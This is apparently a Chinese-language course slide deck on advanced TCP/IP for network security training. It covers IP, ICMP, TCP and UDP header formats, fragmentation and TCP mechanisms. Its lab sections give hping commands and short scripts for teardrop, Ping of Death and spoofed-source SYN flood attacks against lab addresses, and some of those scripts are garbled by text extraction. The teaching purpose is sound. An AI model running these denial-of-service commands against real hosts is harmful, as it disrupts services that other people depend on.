网络安全高级应用第一章TCPIP高级技术

《网络安全高级应用第一章TCPIP高级技术》由会员分享，可在线阅读，更多相关《网络安全高级应用第一章TCPIP高级技术（38页珍藏版）》请在金锄头文库上搜索。

1、BENET3.0第二学期课程,网络安全高级应用,课程目标,掌握TCP/IP高级技术 部署Cisco ASA安全设备防御网络攻击 理解VPN技术理论，配置实现IPSec VPN、Easy VPN、SSL VPN，并能够排除故障 部署802.1x局域网接入认证，增强网络安全性 搭建AAA服务器，控制内网和VPN接入用户访问应用服务器的权限,2,课程结构,3,BENET3.0第二学期课程,第一章 TCP/IP高级技术, 理论部分,技能展示,会分析IP数据报首部的格式 会分析ICMP报文首部的格式 会分析TCP和UDP报文首部的格式 会使用hping模拟实现网络攻击,5,本章结构,TCP/IP高级技术

2、,IP数据报,ICMP报文,IP分片,查询报文,差错报告报文,TCP报文段首部的格式,TCP协议,TCP连接,TCP的其它机制,TCP的MSS,UDP协议,IP数据报首部的格式,6,IP数据报,IP数据报的组成 IP数据报首部的格式,7,IP分片,IP分片的原理 MTU以太网常见的帧格式：再分片 分片重装,MTU,8,IP分片-演示实验环境,Windows2003,Windows2003,RHEL5,安装Sniffer软件,安装Sniffer软件,安装hping2源码包,9,IP分片-演示实验过程,-n：发送数据报文的个数 - l：发送数据报文的大小,C: ping 192.168.1.1 l

3、 2000 n 1,开启Sniffer软件,Ping命令测试,10,分片1： 分片2：,IP分片-演示实验分析,每个分片都是独立的IP数据报文，都有一个20字节的首部,Identification（标志）： 标识都为6307，表示它们原先属于同一个IP数据报文,Flags（标志）： 第2位：0表示允许分片 第3位：0表示最后一个分片，1表示还有后续的分片,Fragment offset（分片偏移）： 分片报文在原始数据报文中的偏移量,11,IP分片-偏移值,原始数据报 数据部分的长度：200082008 分片1 数据部分的长度：1480 偏移：0 分片2 数据部分的长度：528 偏移：1480

4、,12,IP分片的安全问题,泪滴（teardrop）攻击 Hping可以构造各种IP、ICMP、TCP、UDP报文hping相关参数说明,13,构造正常的IP分片,rootkkg sbin# more cs.sh #!/bin/bash ./hping 192.168.1.1 -1 -x -d 1000 -N 100 -c 1 ./hping 192.168.1.1 -1 -d 200 -g 1008 -N 100 -c 1,开启Sniffer软件,编写脚本文件cs.sh,运行脚本文件cs.sh,分析Web主机抓到的报文 Web主机返回Echo reply，说明重装成功,14,构造重叠偏移的I

5、P分片,将分片2的偏移值指定为400，偏移就会重叠实现命令,./hping 192.168.1.1 -1 -d 200 -g 400 -N 100 -c 1,15,模拟泪滴攻击,#!/bin/bashfor (i=100;i ping 1.1.1.1 Reply from 192.168.1.254: Destination host unreachable.,20,端口不可达的演示,在Web主机上启用Sniffer抓包 在PC2主机上向Web主机的UDP端口80发送一个UDP报文 分析抓到的数据包 Type = 3 Code = 3（port unreachable）,rootkkg sbi

6、n# hping 192.168.1.1 -2 -p 80 -c 1,21,源点抑制报文和超时报文,源点抑制报文的概念 对每一个因为拥塞而丢弃的数据报，路由器或主机都应当发送源点抑制报文。 超时报文产生的两种情况： 中间路由器收到数据报后发现其TTL字段的值为1或0 目的主机在规定时间内没有收到所有的分片 超时报文的首部格式,22,超时报文的演示,在PC1主机上启用Sniffer抓包 在PC2主机上向Web主机发送1个TTL为1的ICMP报文，并伪造源IP为192.168.0.1（PC1主机） 分析抓到的数据包,rootkkg sbin# hping 192.168.1.1 -1 -t 1 -

7、c 1 a 192.168.0.1,23,TCP协议,TCP报文段的封装 TCP报文段的首部格式,TCP编号的特点： 初始序号随机 每一个方向的编号互相独立 每个字节都编号，序号就是报文段中第一个字节的编号,24,TCP连接,面向连接的协议 TCP连接的三个阶段 连接建立 数据传输 连接终止 连接建立 3次握手 产生安全问题，即SYN Flood SYN Flood的演示 在PC2上发动SYN Flood攻击：,hping 192.168.1.1 p 80 i u1 S a 1.1.1.1,25,TCP的数据传输和连接终止,数据传输 连接建立后，客户端和服务器都可以在两个方向传送数据和确认。

8、两种比较特殊的数据传送 推送数据 紧急数据 连接终止 建立与FTP站点的连接 在FTP站点（Web主机）启用Sniffer软件 输入命令“bye”断开连接，分析数据报文,26,TCP的连接终止和连接复位,TCP断开连接的四次握手示意图,连接复位 拒绝连接请求、异常终止连接、终止空闲的连接,PC1,PC2,1. 发送FIN/ACK报文 （FIN=1，ACK=1）,2. 发送ACK报文 （ACK1）,3. 发送FIN/ACK报文 （FIN=1，ACK=1）,4. 发送ACK报文 （ACK1）,27,TCP的MSS,MSS的概念 MSS选项的格式,MSS与MTU MSS的特点 只存在于SYN报文和S

9、YN+ACK报文中 在连接建立阶段协商确定后，在连接期间保持不变 MSS的演示实验,种类：2,长度：4,最大报文段长度,2字节,1字节,1字节,28,TCP的其它机制,流量控制 滑动窗口,差错控制 拥塞控制,n,展开,合拢,已发送，但未确认,n+1,m-1,m,可立即发送,n-1,m+1,窗口大小,已发送，且已确认,在窗口展开之前不能被发送,29,TCP的计时器,重传计时器 用来重传丢失的报文段 持久计时器 用来防止出现TCP/IP死锁 保活计时器 计时器超时，将发送探测报文段，判定客户端故障 时间等待计时器 用于终止连接,30,UDP协议,UDP协议 无连接、不可靠的传输协议 花费的开销小

10、UDP报文的首部格式,31,本章总结,TCP/IP高级技术,IP数据报,ICMP报文,IP分片,查询报文,差错报告报文,TCP报文段首部的格式,TCP协议,TCP连接,TCP的其它机制,TCP的MSS,UDP协议,IP数据报首部的格式,32,BENET3.0第二学期课程,第一章 TCP/IP高级技术, 上机部分,实验案例1：模拟实现死亡之Ping,需求描述 使用hping构造IP分片，模拟实现死亡之Ping,34,实验案例1：模拟实现死亡之Ping,实现思路 构造重装后大于65535字节的IP分片学员练习,35,30分钟完成,./hping 192.168.1.1 -1 -x -d 1400

11、-N 100 -c 1 for (i=1;i50;i+) doj=expr $i * 1408./hping 192.168.1.1 -1 -x -d 1400 -g $j -N 100 -c 1 done ./hping 192.168.1.1 -1 -d 1000 -g 70400 -N 100 -c 1,实验案例2：模拟实现SYN Flood,需求描述 使用hping构造SYN报文段，模拟实现SYN Flood,36,实验案例2：模拟实现SYN Flood,实现思路 在PC2上发动SYN Flood攻击。 在Web服务器上用Sniffer抓包，分析SYN报文段。查看TCP连接状态，查看CPU使用率。 学员练习,37,30分钟完成,